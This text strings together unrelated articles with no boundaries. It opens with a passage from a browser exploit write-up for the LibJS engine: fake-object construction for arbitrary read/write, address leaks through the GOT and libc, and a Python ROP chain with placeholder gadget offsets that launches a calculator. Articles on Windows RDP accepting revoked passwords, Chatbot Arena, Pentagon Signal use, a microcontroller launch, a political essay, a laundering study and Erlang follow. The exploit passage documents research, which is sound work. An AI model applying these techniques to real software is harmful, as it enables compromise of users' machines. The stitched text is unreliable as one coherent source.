Furthermore, if the storage type is SimpleIndexedPropertyStorage, then the following method is used. This indexes into the m_packed_elements vector using our offset. This code path (indexing into an array-like object that has a SimpleIndexedPropertyStorage) contains no virtual function calls, meaning we don’t need to give our fake object a vtable pointer — which is useful, in that we don’t need to know where one is.
We set up our fake object such that m_indexed_properties points to a fake SimpleIndexedPropertyStorage object, whose m_packed_elements then points to the location of the read.
This is simpler than it sounds, as all these structures can be overlapped in the same memory region.
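To make that concrete, here is a sketch of building such an overlapped region. Every offset and field position below is a hypothetical placeholder (the real layouts have to be read out of the targeted LibJS build), but it shows the shape of the trick:

import struct

def build_fake_region(base, read_target):
    # base: address this buffer will land at; read_target: where to read from
    storage_addr = base + 0x40              # fake storage overlapped in-buffer
    obj = struct.pack("<Q", 0)              # +0x00: vtable slot, unused on this path
    obj += struct.pack("<Q", storage_addr)  # +0x08: m_indexed_properties (assumed offset)
    obj = obj.ljust(0x40, b"\x00")          # pad up to the fake storage
    stor = struct.pack("<Q", 1)             # flag word: m_is_simple_storage = true
    stor += struct.pack("<Q", read_target)  # m_packed_elements data pointer
    return obj + stor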
Now that we have the structures laid out in memory, all that’s left is ensuring:
[2] passes: by setting m_may_interfere_with_indexed_property_access to false,
and [3] passes: by setting m_is_simple_storage on the object storage to true.
After we have a reliable read capability, we can leak the vtable for SimpleIndexedPropertyStorage, then patch our fake storage object. This gives us a write capability by doing the opposite process to the read, without crashing.
Code Execution
Once we have an arbitrary read/write, we have complete control over the renderer:
We can mess with internal values in the renderer,
We can craft a fake vtable to gain control flow after a stack pivot,
We can overwrite stack return pointers and construct a ROP chain.
The most reliable method for getting code execution appears to be overwriting a return pointer.
First, we leak the location of the stack by following a chain of pointers around the address space. The chain begins with a pointer into the LibJS mapping (the vtable pointer of our object). From there, we leak a GOT entry taking us to libc, where we finally leak a pointer to the stack (via __libc_argv).
Once we’ve found the stack, we search for a specific return pointer (__libc_start_call_main) and overwrite it with a ROP chain. The POC ROP chain is simple; it execve’s /calc (syscall 0x3b), which is a symbolic link to the calculator app. A more complex payload would map RWX pages for a second stage.
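Assembling such a chain is mostly byte-packing. Here is a sketch with invented gadget offsets; the real exploit derives them from the libc pointer leaked via the GOT, since ASLR moves them on every run:

import struct

def p64(v):
    return struct.pack("<Q", v)

LIBC_BASE = 0x7f0000000000        # placeholder: computed from the leak in practice
POP_RDI = LIBC_BASE + 0x2a3e5     # example gadget offsets, not real ones
POP_RSI = LIBC_BASE + 0x2be51
POP_RDX = LIBC_BASE + 0x11f2e7
POP_RAX = LIBC_BASE + 0x45eb0
SYSCALL = LIBC_BASE + 0x91316
CALC_STR = LIBC_BASE + 0x200000   # some writable address holding b"/calc\x00"

chain = p64(POP_RDI) + p64(CALC_STR)  # rdi -> "/calc"
chain += p64(POP_RSI) + p64(0)        # rsi = argv = NULL
chain += p64(POP_RDX) + p64(0)        # rdx = envp = NULL
chain += p64(POP_RAX) + p64(0x3b)     # rax = SYS_execve
chain += p64(SYSCALL)                 # execve("/calc", NULL, NULL)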
All that’s left is to close the tab, which will collapse the stack and trigger the ROP chain.
This is the final exploit code for the browser, and this is the exploit for the REPL. Both work on b8fa355a21 (x86_64-linux).
Below is a video of the final exploit!
Windows RDP lets you log in using revoked passwords. Microsoft is OK with that
The ability to use a revoked password to log in through RDP occurs when a Windows machine that’s signed in with a Microsoft or Azure account is configured to enable remote desktop access. In that case, users can log in over RDP with a dedicated password that’s validated against a locally stored credential. Alternatively, users can log in using the credentials for the online account that was used to sign in to the machine.
A screenshot of an RDP configuration window showing that a Microsoft account (for Hotmail) has remote access.
Even after users change their account password, however, it remains valid for RDP logins indefinitely. In some cases, Wade reported, multiple older passwords will work while newer ones won’t. The result: persistent RDP access that bypasses cloud verification, multifactor authentication, and Conditional Access policies.
Wade and another expert in Windows security said that the little-known behavior could prove costly in scenarios where a Microsoft or Azure account has been compromised, for instance when the passwords for them have been publicly leaked. In such an event, the first course of action is to change the password to prevent an adversary from using it to access sensitive resources. While the password change prevents the adversary from logging in to the Microsoft or Azure account, the old password will give an adversary access to the user’s machine through RDP indefinitely.
“This creates a silent, remote backdoor into any system where the password was ever cached,” Wade wrote in his report. “Even if the attacker never had access to that system, Windows will still trust the password.”
Will Dormann, a senior vulnerability analyst at security firm Analygence, agreed.
"It doesn't make sense from a security perspective," he wrote in an online interview. "If I'm a sysadmin, I'd expect that the moment I change the password of an account, then that account's old credentials cannot be used anywhere. But this is not the case."
Credential caching is a problem
The mechanism that makes all of this possible is credential caching on the hard drive of the local machine. The first time a user logs in using Microsoft or Azure account credentials, RDP will confirm the password's validity online. Windows then stores the credential in a cryptographically secured format on the local machine. From then on, Windows will validate any password entered during an RDP login by comparing it against the locally stored credential, with no online lookup. With that, the revoked password will still give remote access through RDP.
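The resulting logic can be modeled in a few lines of Python. This is a conceptual sketch only, not Windows' actual cache format or algorithm; it just shows why a password change at the identity provider never invalidates the local verifier:

import hashlib, hmac, os

CACHE = {}  # stand-in for the locally stored, cryptographically secured credential

def first_login(user, password):
    # Online login: the provider validates, then a local verifier is cached
    salt = os.urandom(16)
    CACHE[user] = (salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000))

def rdp_login(user, password):
    # Later logins: checked only against the cached verifier, no online lookup
    salt, stored = CACHE[user]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(stored, candidate)

first_login("alice", "OldPassword1")
# ... Alice's cloud password is later changed to "NewPassword2" ...
print(rdp_login("alice", "OldPassword1"))  # True: the revoked password still works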
Understanding the recent criticism of the Chatbot Arena
Simon Willison
simonwillison.net
2025-04-30 23:55:46
The Chatbot Arena has become the go-to place for vibes-based evaluation of LLMs over the past two years. The project, originating at UC Berkeley, is home to a large community of model enthusiasts who submit prompts to two randomly selected anonymous models and pick their favorite response. This prod...
The Chatbot Arena has become the go-to place for vibes-based evaluation of LLMs over the past two years. The project, originating at UC Berkeley, is home to a large community of model enthusiasts who submit prompts to two randomly selected anonymous models and pick their favorite response. This produces an Elo score leaderboard of the “best” models, similar to how chess rankings work.
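For anyone unfamiliar with how pairwise votes turn into ratings, here’s a minimal Python sketch of the classic Elo update; the arena’s production pipeline is more sophisticated than this, so treat it as a conceptual model only:

K = 32  # sensitivity of each update; chess federations typically use 16-32

def expected(r_a, r_b):
    # Probability that A beats B under the Elo model
    return 1 / (1 + 10 ** ((r_b - r_a) / 400))

def update(r_a, r_b, a_won):
    # Shift both ratings toward the observed outcome
    e = expected(r_a, r_b)
    s = 1.0 if a_won else 0.0
    return r_a + K * (s - e), r_b + K * ((1 - s) - (1 - e))

# One vote: a 1200-rated model beats a 1300-rated one
print(update(1200, 1300, True))  # approximately (1220.5, 1279.5)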
It’s become one of the most influential leaderboards in the LLM world, which means that billions of dollars of investment are now being evaluated based on those scores.
The Leaderboard Illusion
A new paper, The Leaderboard Illusion, by authors from Cohere Labs, AI2, and Princeton, Stanford, Waterloo, and Washington universities spends 68 pages dissecting and criticizing how the arena works.
Even prior to this paper there have been rumbles of dissatisfaction with the arena for a while, based on intuitions that the best models were not necessarily bubbling to the top. I’ve personally been suspicious of the fact that my preferred daily driver, Claude 3.7 Sonnet, rarely breaks the top 10 (it’s sat at 20th right now).
This all came to a head a few weeks ago when the Llama 4 launch was marred by a leaderboard scandal: it turned out that their model which topped the leaderboard wasn’t the same model that they released to the public! The arena released a pseudo-apology for letting that happen.
This helped bring focus to the arena’s policy of allowing model providers to anonymously preview their models there, in order to earn a ranking prior to their official launch date. This is popular with their community, who enjoy trying out models before anyone else, but the scale of the preview testing revealed in this new paper surprised me.
From the new paper’s abstract (highlights mine):
We find that undisclosed private testing practices benefit a handful of providers who are able to test multiple variants before public release and retract scores if desired. We establish that the ability of these providers to choose the best score leads to biased Arena scores due to selective disclosure of performance results. At an extreme, we identify 27 private LLM variants tested by Meta in the lead-up to the Llama-4 release.
If proprietary model vendors can submit dozens of test models, and then selectively pick the ones that score highest, it is not surprising that they end up hogging the top of the charts!
This feels like a classic example of gaming a leaderboard. There are model characteristics that resonate with evaluators there that may not directly relate to the quality of the underlying model. For example, bulleted lists and answers of a very specific length tend to do better.
It is worth noting that this is quite a salty paper (highlights mine):
It is important to acknowledge that a subset of the authors of this paper have submitted several open-weight models to Chatbot Arena: command-r (Cohere, 2024), command-r-plus (Cohere, 2024) in March 2024, aya-expanse (Dang et al., 2024b) in October 2024, aya-vision (Cohere, 2025) in March 2025, command-a (Cohere et al., 2025) in March 2025. We started this extensive study driven by this submission experience with the leaderboard.
While submitting Aya Expanse (Dang et al., 2024b) for testing, we observed that our open-weight model appeared to be notably under-sampled compared to proprietary models — a discrepancy that is further reflected in Figures 3, 4, and 5. In response, we contacted the Chatbot Arena organizers to inquire about these differences in November 2024. In the course of our discussions, we learned that some providers were testing multiple variants privately, a practice that appeared to be selectively disclosed and limited to only a few model providers. We believe that our initial inquiries partly prompted Chatbot Arena to release a public blog in December 2024 detailing their benchmarking policy which committed to a consistent sampling rate across models. However, subsequent anecdotal observations of continued sampling disparities and the presence of numerous models with private aliases motivated us to undertake a more systematic analysis.
To summarize the other key complaints from the paper:
Unfair sampling rates: a small number of proprietary vendors (most notably Google and OpenAI) have their models randomly selected in a much higher number of contests.
Transparency concerning the scale of proprietary model testing that’s going on.
Unfair removal rates: “We find deprecation disproportionately impacts open-weight and open-source models, creating large asymmetries in data access over”—also “out of 243 public models, 205 have been silently deprecated.” The longer a model stays in the arena the more chance it has to win competitions and bubble to the top.
The Arena responded to the paper in a tweet. They emphasized:
We designed our policy to prevent model providers from just reporting the highest score they received during testing. We only publish the score for the model they release publicly.
I’m disappointed by this response, because it skips over the point from the paper that I find most interesting. If commercial vendors are able to submit dozens of models to the arena and then cherry-pick for publication just the model that gets the highest score, quietly retracting the others with their scores unpublished, that means the arena is very actively incentivizing models to game the system. It’s also obscuring a valuable signal to help the community understand how well those vendors are doing at building useful models.
Here’s a second tweet where they take issue with “factual errors and misleading statements” in the paper, but still fail to address that core point. I’m hoping they’ll respond to my follow-up question asking for clarification around the cherry-picking loophole described by the paper.
I want more transparency
The thing I most want here is transparency.
If a model sits in top place, I’d like a footnote that resolves to additional information about how that vendor tested that model. I’m particularly interested in knowing how many variants of that model the vendor tested. If they ran 21 different models over a 2 month period before selecting the “winning” model, I’d like to know that—and know what the scores were for all of those others that they didn’t ship.
This knowledge will help me personally evaluate how credible I find their score. Were they mainly gaming the benchmark or did they produce a new model family that universally scores highly even as they tweaked it to best fit the taste of the voters in the arena?
OpenRouter as an alternative?
If the arena isn’t giving us a good enough impression of who is winning the race for best LLM at the moment, what else can we look to?
Andrej Karpathy discussed the new paper on Twitter this morning and proposed an alternative source of rankings instead:
It’s quite likely that LM Arena (and LLM providers) can continue to iterate and improve within this paradigm, but in addition I also have a new candidate in mind to potentially join the ranks of “top tier eval”. It is the OpenRouterAI LLM rankings.
Basically, OpenRouter allows people/companies to quickly switch APIs between LLM providers. All of them have real use cases (not toy problems or puzzles), they have their own private evals, and all of them have an incentive to get their choices right, so by choosing one LLM over another they are directly voting for some combo of capability+cost.
I don’t think OpenRouter is there just yet in both the quantity and diversity of use, but something of this kind I think has great potential to grow into a very nice, very difficult to game eval.
I only recently learned about these rankings but I agree with Andrej: they reveal some interesting patterns that look to match my own intuitions about which models are the most useful (and economical) on which to build software. Here’s a snapshot of their current “Top this month” table:
The one big weakness of this ranking system is that a single, high volume OpenRouter customer could have an outsized effect on the rankings should they decide to switch models. It will be interesting to see if OpenRouter can design their own statistical mechanisms to help reduce that effect.
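To make that concrete, here’s one simple mechanism of the kind they might adopt. This is a sketch of my own, not anything OpenRouter has announced: cap any single customer’s contribution to the rankings at a fixed share of total volume:

from collections import defaultdict

def capped_ranking(events, cap=0.05):
    # events: iterable of (customer_id, model, tokens) tuples.
    # Each customer's weight is capped at `cap` of total volume, so one
    # high-volume customer switching models moves the ranking only so far.
    events = list(events)
    total = sum(t for _, _, t in events) or 1.0
    by_customer = defaultdict(float)
    for customer, _, tokens in events:
        by_customer[customer] += tokens
    scale = {c: min(1.0, cap * total / v) for c, v in by_customer.items()}
    scores = defaultdict(float)
    for customer, model, tokens in events:
        scores[model] += tokens * scale[customer]
    return sorted(scores.items(), key=lambda kv: -kv[1])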
US defense secretary circumvents the official communications equipment
US defense secretary Pete Hegseth appears to have a private computer in his office that is linked to the public internet. He wanted this computer to use the messaging app Signal, which is the preferred method of communication among Trump's government officials.
US defense secretary Pete Hegseth in his office in the Pentagon, January 30, 2025 (Still from a video message on X, formerly Twitter)
Hegseth's government equipment
Like his predecessors, Trump's defense secretary Pete Hegseth has access to a range of secure and non-secure telephone and computer networks. The equipment is installed on a table behind him when he sits at his large writing desk in the Pentagon.
In the photo above we can see that equipment in a set-up that has basically been unchanged since Chuck Hagel, who was Obama's secretary of Defense from 2013 to 2015. In the photo of Pete Hegseth we see from left to right:
- On top of a wooden stand sits a Cisco IP Phone 8851 with a 14-key expansion module. This phone is part of the Crisis Management System (CMS), which connects the President, the National Security Council, Cabinet members, the Joint Chiefs of Staff, intelligence agency watch centers, and others. Its bright yellow bezel indicates that it can be used for conversations up to Top Secret/Sensitive Compartmented Information (TS/SCI).
- Below the CMS phone on the wooden stand is (hardly visible) an Integrated Services Telephone-2 (IST-2), which can be used for both secure and non-secure phone calls. This phone belongs to the Defense Red Switch Network (DRSN), also known as the Multilevel Secure Voice service, which connects the White House, all military command centers, intelligence agencies, government departments and NATO allies.
- Right in front of the IST-2 is another Cisco IP Phone 8851 with a 14-key expansion module, but this time with a green bezel, which indicates that it's for unclassified phone calls. This phone is part of the internal telephone network of the Pentagon and replaced an Avaya Lucent 6424 executive phone.
A better view of these phones is provided by the following photo from 2021:
Former secretary of defense Lloyd Austin in his Pentagon office in 2021, with a Cisco IP phone with yellow bezel for the CMS and an IST-2 phone with many red buttons for the DRSN. (DoD photo)
- Besides the telephones there are two computer screens, both with a bright green wallpaper, which again indicates that they are connected to an unclassified network, most likely NIPRNet. In the photo of Lloyd Austin's office we see that there's also a KVM switch which is used to switch securely to the SIPRNet (Secret) and JWICS (Top Secret/SCI) networks, using the same keyboard, video and mouse set.
- Finally, at the right side of the table there are two Cisco Webex DX80 video teleconferencing screens. The one at the right has a yellow label, which indicates that it's approved for Top Secret/SCI and most likely belongs to the Secure Video Teleconferencing System (SVTS), which is part of the aforementioned Crisis Management System (CMS). The other screen might then be for videoconferences at a lower classification level.
Hegseth's personal computer
Despite the wide range of options for communicating via the proper and secure government channels, secretary Hegseth insisted on using Signal. Apparently it wasn't allowed or possible to install this app on one of the government computers, nor on a smartphone that is approved for classified conversations.
Therefore, Hegseth initially went to the back area of his office where he could access Wi-Fi to use Signal, according to AP News. It's not clear whether he used a private laptop or his personal smartphone, both of which would have been strictly forbidden to use in secure areas like this.
Somewhat later, Hegseth requested an internet connection to his desk where he could use a computer of his own. This line connects directly to the public internet and bypasses the Pentagon's security protocols. This new computer must be the one that can be seen in the photo below, as it wasn't there yet on February 21 and has no labels that indicate its classification level:
US defense secretary with a new desktop computer on his desk, March 20, 2025 (DoD photo, see also this video message on X)
Some other employees at the Pentagon also use direct lines to the public internet, for example when they don't want to be recognized by an IP address assigned to the Pentagon. That's risky because such a line is less well monitored than NIPRNet, which allows limited access to the outside internet.
At his new desktop computer, Hegseth had Signal installed, which means he effectively 'cloned' the Signal app that is on his personal smartphone. According to some press sources, he was also interested in installing a program to send conventional text messages from this personal computer.
The move was intended to circumvent a lack of cellphone service in much of the Pentagon and enable easier communication with the White House and other Trump officials who are using the Signal app.
SecDef Cables
It is remarkable to what great lengths Hegseth went to use the Signal app, because as defense secretary he has his own communications center which is specialized in keeping him in contact with anyone he wants. This center is commonly called SecDef Cables and is part of
Secretary of Defense Communications
(SDC) unit.
SecDef Cables provides operational information management and functions as a command and control support center. It is staffed by 26 service members and 4 civilians. They provide "comprehensive voice, video, and data capabilities to the secretary and his immediate staff, regardless of their location, across multiple platforms and classifications."
Furthermore, SecDef Cables serves as a liaison to the National Military Command Center (NMCC), the White House Situation Room, the State Department Operations Center and similar communication centers. Finally, Cables provides the connections for the Defense Telephone Link (DTL), which is a lower-level hotline with military counterparts in about 25 countries, including Russia and China.
Secretary of Defense Communications recruitment video from 2023
Today, we are glad to announce that ESP32-C5 is now in mass production.
Espressif Systems (SSE: 688018.SH) announced ESP32-C5, the industry’s first RISC-V SoC that supports 2.4 GHz and 5 GHz dual-band Wi-Fi 6, along with Bluetooth 5 (LE) and IEEE 802.15.4 (Zigbee, Thread) connectivity. Today, we are glad to announce that ESP32-C5 is now in mass production.
ESP32-C5 is designed for applications that require high-efficiency, low-latency wireless transmission. ESP32-C5 has a 32-bit single-core processor clocked at up to 240 MHz, 384 KB of on-chip SRAM (with external PSRAM support), and 320 KB of ROM. It has up to 29 programmable GPIOs, supporting all the commonly used peripherals, high-speed interfaces like SDIO and QSPI, and best-in-class security features. The ESP32-C5 also includes an LP-CPU running at up to 40 MHz, which can act as the main processor for power-sensitive applications. To learn more about the various capabilities and features of this MCU, please visit our website.
The ESP32-C5 benefits from software support provided by Espressif's well-established IoT development framework, ESP-IDF. The upcoming ESP-IDF v5.5 will include initial support for the ESP32-C5. For a detailed list of ESP-IDF features supported for the ESP32-C5,
click here
. The ESP32-C5 can also act as the connectivity coprocessor for external hosts using the
ESP-AT
or
ESP-Hosted
solutions.
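As a concrete illustration of the coprocessor mode, here is a minimal sketch of a host computer driving an ESP-AT module over a serial port, using Python and the pyserial package. This is my own illustration rather than an official Espressif example, and it targets generic ESP-AT firmware; the port name and baud rate are assumptions to adjust for your setup.

    # Query an ESP-AT module for its firmware version from a host computer.
    # Requires the pyserial package (pip install pyserial).
    import serial

    # Hypothetical port name; 115200 is a common ESP-AT default baud rate.
    with serial.Serial("/dev/ttyUSB0", 115200, timeout=2) as port:
        port.write(b"AT+GMR\r\n")  # AT+GMR reports the AT firmware version
        print(port.read(512).decode(errors="replace"))

The same request/response pattern extends to joining a Wi-Fi network or opening TCP connections, which is what lets a simple external host borrow the chip's connectivity.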
Marc Andreessen, Tucker Carlson, and a Winklevoss walk into a bar… and the rest of us run out of it screaming.
Marc Andreessen attends the 10th Annual Breakthrough Prize Ceremony at the Academy Museum of Motion Pictures on April 13, 2024, in Los Angeles.
(JC Olivera / WireImage via Getty Images)
For anyone thinking that the notorious Signal chat organizing a bombing raid on the Houthis was a
one-off lapse of judgment
by the people at the center of American power (possibly because it involved Pete Hegseth),
Semafor
media scribe Ben Smith
comes bearing the tale
of a much larger, more influential mustering of Signal-ites. Smith’s piece concerns a cluster of ultra-wealthy and/or politically connected Silicon Valley plutocrats who, after several earlier forays into unbuckled opinion-shaping on secure chat platforms, now swap critiques and aperçus on a Signal group chat dubbed Chatham House, after a privacy-conscious international policy think tank based in London.
Like all things involving Silicon Valley, the group name is a symptom of delusional collective self-regard. The original think tank, founded in the wake of the 1919 Treaty of Versailles, has sought to chart new global accords on issues ranging from 20th-century decolonization to climate-change mitigation; its online LARPers include such luminaries as right-wing apparatchik-for-hire Chris Rufo and Sriram Krishnan, the Trump administration’s senior policy adviser for AI. The chat’s chief ringleader is Marc Andreessen, the erstwhile Netscape founder and present-day lord of venture capital, who, as Smith notes, has been instrumental in Silicon Valley’s fulsome embrace of Donald Trump. By distilling the ideological leanings of the Silicon Valley elite, Chatham House and its forerunner chats exert an outsize kind of cultural and political clout, Smith writes. In getting key influencers and business titans on the same page, “their influence flows through X, Substack, and podcasts, and constitutes a kind of dark matter of American politics and media. The group chats aren’t always primarily a political space, but they are the single most important place in which a stunning realignment toward Donald Trump was shaped and negotiated, and an alliance between Silicon Valley and the new right formed.”
No doubt Andreessen and his fellow chatters are gratified to see themselves hymned in such heady terms, but what Smith has unearthed of the chat’s exchanges and thematic preoccupations bespeaks a much more mundane and inert boardroom-grade discourse of like-minded self-congratulation, with a heavy dose of culture-war persecution fantasies to keep things feeling edgy. It’s less dark matter than brain-dead matter.
That, by itself, isn’t an indictment of the Chatham House set—these are features endemic to e-mail listservs and group chats, which serve chiefly as a group-surveillance mechanism to ensure that participants don’t end up entertaining remotely original thoughts. Yet, to give credit to Smith’s scooplet, the Chatham chats do furnish valuable insight into the preferred mode of groupthink endorsed by our digital overlords. And not surprisingly, this brand of orthodoxy hinges on the grand conceit that they and their peers are the chosen prime movers of history—and that dissenters are, at best, misguided Luddites, and at worst, power-mad and puritanical censors.
Don’t take my word for it. Here’s Smith’s report on the group’s titanic sense of entitlement:
Many of the roughly 20 participants I spoke to…felt a genuine sentimental attachment to the spaces, and believed in their value. One participant in the groups described them as a “Republic of Letters,” a reference to the long-distance intellectual correspondence of the 17th century. Others often invoked European salon culture. The closed groups offered an alternative to the Twitter and Slack conversations once dominated by progressive social movements, when polarizing health debates swept through social media and society in the early days of the COVID-19 pandemic.
If you think that feeling victimized by public health strictures and stray Twitter trolls is a good deal short of the spirit of Voltaire and Madame de Staël, just get a load of Andreessen’s own maunderings. Andreessen, it emerges, is a manic poster to Chatham House and an untold number of other plutocrat-friendly group chats; Smith recounts how one conference attendee seated alongside Andreessen watched him frenetically posting to several chats at lightning speed on his phone. That level of passionate intensity corresponds to Andreessen’s rhetorical overkill in characterizing the role of these chats. They are, he pronounced in a February podcast appearance, “the equivalent of samizdat,” offering bold freethinkers refuge in a regime of “soft authoritarian” conformity enforced by social media mobs and censorship-drunk administrators.
So what, exactly, are the big ideas bandied about in these chats that are simply too incendiary for the sclerotic custodians of the old Twitter politburo? Per Smith, the effects of Chatham House iconoclasm “have ranged from the mainstreaming of the monarchist pundit Curtis Yarvin to a particularly focused and developed dislike of the former Washington Post writer Taylor Lorenz.” Take that, Enlightenment philosophes! You’d think that soi-disant liberators of humanity like Andreessen might pause to reflect that there’s nothing all that samizdat-ish about platforming a fucking monarchist—let alone unleashing a strategic alliance against an overdramatic tech reporter. But this combination of free-floating tetchiness and laser-focused pettiness is at the heart of what Andreessen is pleased to call his curation of the new national “vibe shift,” as the fortunes of one of his earlier group chats make all too plain.
As Smith lays out in numbing detail, an embryonic version of the Chatham House thread was populated by a mixture of the professionally aggrieved Valley leadership caste and a number of the signatories of the 2020 “Harper’s Letter” that professed to divine a troubling new epidemic of PC censorship of American intellectual discourse. The chat, in a good example of what passes for humor among this crowd, was called “Everything’s Fine.” Yet a fatal schism occurred when two participants—
Atlantic
writer Thomas Chatterton Williams and podcast host Kmele Foster—collaborated with David French and Jason Stanley on a
New York Times
op-ed denouncing the moral panic over critical race theory as a betrayal of First Amendment principles. The right-wingers on the chat regarded that as a faithless act from people they saw as “their allies in an all-out ideological battle,” Smith writes. One erstwhile member recalls that Andreessen in particular “went really ballistic in a quite personal way at Thomas,” and shortly afterward announced that he was bailing from the group, thereby depriving it of its principal posting stream. It died out in short order—along with, presumably, the countless breakthroughs that surely would have emerged from such a hotbed of intellectual activity.
Andreessen’s outburst was more than the classic hypocrisy and bad faith of the “free speech for me but not for thee” opportunist. It’s clear that, despite all his bluster about promoting open debate in a world ridden with small-minded and vengeful censors, Andreessen endorses only the kind of debate that ratifies his pre-existing prejudices. It was, indeed, in that spirit that he prevailed upon Richard Hanania—then an ardent white nationalist on the right—to launch a new group chat “of smart right-wing people.” The chat had no fixed name, but the rotating sobriquets Andreessen graced it with speak volumes about his preferred brand of samizdat discourse; they included “Last Men, apparently,” “James Burnham Fan Club,” “Matt Yglesias Fan Club” and “Journalism Deniers and Richard,” apparently in reference to Hanania. For his part, Hanania, who is now in the midst of a public defection from the hardcore anti-woke right, told Smith that he left the chat in 2023, after seeing it devolve into “a vehicle for groupthink.” He recalls breaking with many participants “about whether it’s a good idea to buy into Trump’s election denial stuff. I’d say, ‘That’s not true and that actually matters.’ I got the sense these guys didn’t want to hear it. There’s an idea that you don’t criticize, because what really matters is defeating the left.”
As for Chatham House, it’s now apparently weathering its own schism over Trump’s regressive tariffs policy, which are anathema to a tech industry heavily reliant on Asian labor markets and supply chains. In one of the only chat transcripts Smith was able to obtain, David Sacks, the hedge-fund billionaire who now serves as Trump’s AI and crypto czar, announces his defection from the group by saying it’s “become worthless” due to rampant Trump derangement syndrome—triggering in turn the departures of other influential MAGA sycophants like Tucker Carlson and Tyler Winklevoss. (Nothing says “Republic of Letters” like those two. You can practically smell the brilliance.) Before scarpering, Sacks also prevailed on the chat manager to “create a new [chat] with just smart people,” again illustrating the suffocatingly narrow conception of intelligence now on offer for both Sand Hill Road and Pennsylvania Avenue.
For someone who entertains such reveries of personal and political grandeur—and who so jealously guards his private exercise of intellectual freedom—it’s useful to be reminded of how Marc Andreessen really views the world. Historian Rick Perlstein—an old friend and ally—has published
a bracing remembrance
of a 2017 talk he gave at one of Andreessen’s Northern California manses, at the invitation of a book group Andreessen belonged to. The evening was mostly taken up with genial plutocratic badinage, Perlstein recalled, with a recently designated British noble chiding him for his naïveté about the democratic aspirations of the Chinese middle class, and general calumny cast at Senator Elizabeth Warren for the sin of standing athwart “innovation in the banking sector.” After dinner, Perlstein, a native of Milwaukee, fell into a tête-à-tête with Andreessen about his own upbringing in a small rural Wisconsin town. As Perlstein recalls, his host broke off the exchange with this general sentiment: “I’m glad there’s OxyContin and video games to keep those people quiet.”
Perlstein cautioned that the quote wasn’t exact, and indeed invited Andreessen to correct the wording. Instead, Andreessen denounced Perlstein’s recollection as a complete fabrication, and his Valley-bred crony JD Vance, among others,
leapt in to deride Perlstein
as another peddler of fake news. (No doubt the whole episode, which occurred in April of 2024, didn’t hurt Vance’s standing as Trump’s eventual vice-presidential nominee.) Having worked closely with Perlstein for more than three decades now (and having heard an earlier version of the story in conversation with him), I have utterly no doubt of his veracity; if anything, Vance’s intervention is surefire testimony to Perlstein’s truthfulness, given our vice president’s penchant for self-advancing mendacity. Yet for any on-the-make MAGA edgelord like Andreessen to be caught out deriding the movement’s base in the putative
strains of Barack Obama
(or more aptly in this case,
Lonesome Rhodes
) is a career death sentence. You can be sure that he took to a wide assortment of group chats to flog his lovingly curated victim narrative and to defend what might charitably be termed his honor.
Pre- and post-domestic laundering of bacteria-contaminated textiles. Credit: Dr. Caroline Cayrou, CC-BY 4.0 (https://creativecommons.org/licenses/by/4.0/)
Health care workers who wash their uniforms at home may be unknowingly contributing to the spread of antibiotic-resistant infections in hospitals, according to a new study led by Katie Laird of De Montfort University,
published
in
PLOS One.
Hospital-acquired infections are a major public health concern, in part because they frequently involve antibiotic-resistant bacteria. Many nurses and health care workers clean their uniforms at home in standard washing machines, but some studies have found that bacteria can be transmitted through clothing, raising the question of whether these machines can sufficiently prevent the spread of dangerous microbes.
In the new study, researchers evaluated whether six models of home washing machine successfully decontaminated health care worker uniforms, by washing contaminated fabric swatches in hot water, using a rapid or normal cycle. Half of the machines did not disinfect the clothing during a rapid cycle, while one-third failed to clean sufficiently during the standard cycle.
The team also sampled biofilms from inside 12 washing machines. DNA sequencing revealed the presence of potentially pathogenic bacteria and
antibiotic resistance genes
. Investigations also showed that bacteria can develop resistance to domestic detergent, which also increases their resistance to certain antibiotics.
Together, the findings suggest that many home washing machines may be insufficient for decontaminating health care worker uniforms, and may be contributing to the spread of
hospital
-acquired infections and antibiotic resistance. The researchers propose that the laundering guidelines given to health care workers should be revised to ensure that home washing machines are cleaning effectively. Alternatively, health care facilities could use on-site industrial machines to launder uniforms to improve
patient safety
and control the spread of antibiotic-resistant pathogens.
The authors add, "Our research shows that domestic washing machines often fail to disinfect textiles, allowing
antibiotic-resistant bacteria
to survive. If we're serious about the transmission of infectious disease via textiles and tackling antimicrobial resistance, we must rethink how we launder what our
health care workers
wear."
Citation: Home washing machines fail to remove important pathogens from textiles (2025, April 30), retrieved 30 April 2025 from https://medicalxpress.com/news/2025-04-home-machines-important-pathogens-textiles.html
This is the story of Erlang, a programming language that was perhaps too good for its own good.
Corporate blunders are nothing new. Many of these blunders are widely known, such as the time Blockbuster declined to purchase Netflix, or the time Daimler-Benz lost 20 billion dollars on Chrysler. But how many remember when Ericsson created a programming language so disruptive, and so efficient, that the company banned it? This is the fascinating and little-known story behind Erlang.
The Backdrop
The story begins in 1982, at the Swedish telecommunications giant Ericsson, which decided to experiment with the programming of telecom systems, with the goal of improving the development of telephony equipment.
They began with a list of over 20 languages, including Lisp, Prolog, and Parlog, filtering out unsuitable ones with the help of two main criteria.
Side note: I’m going to keep the explanations fairly simple here, so that it’s easier to understand for people who perhaps aren’t programmers.
The first criterion was that the language had to be “high level” and “symbolic”. A high-level language is essentially a language that can be easily written and read by a person. This is then transformed by a ‘compiler’ into more specific instructions which a computer processor can understand. Symbolic means that the language uses characters or symbols to represent concepts like mathematical operations, for example plus (+) and minus (-). These two factors help make software development simpler and faster.
The second criterion was that the language had to have primitives for concurrency and error recovery, and the execution model couldn’t have back-tracking. Without going into the details, this essentially just means that the language had to be capable of the following (a short illustrative sketch follows the list):
Doing multiple things at once
Recovering and not crashing due to errors
Executing instructions in a certain order, without going back to previous instructions.
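To give a flavor of the first two points, here is a minimal illustrative sketch in Python (chosen purely for readability; it is not Erlang, and Erlang's own syntax looks nothing like this): several workers run concurrently, and a small 'supervisor' restarts any worker that crashes instead of letting the whole program die.

    # Concurrency plus error recovery, supervisor-style, in modern Python.
    import asyncio
    import random

    async def worker(name: str) -> None:
        # Do "work" forever; occasionally fail to simulate a software fault.
        while True:
            await asyncio.sleep(0.1)
            if random.random() < 0.2:
                raise RuntimeError(f"{name} hit a simulated fault")

    async def supervise(name: str, restarts: int = 3) -> None:
        # Error recovery: catch the crash and restart the worker.
        for attempt in range(restarts):
            try:
                await worker(name)
            except RuntimeError as exc:
                print(f"supervisor: {exc}, restart {attempt + 1}/{restarts}")
        print(f"supervisor: giving up on {name}")

    async def main() -> None:
        # Concurrency: three supervised workers running at once.
        await asyncio.gather(*(supervise(f"worker-{i}") for i in range(3)))

    asyncio.run(main())

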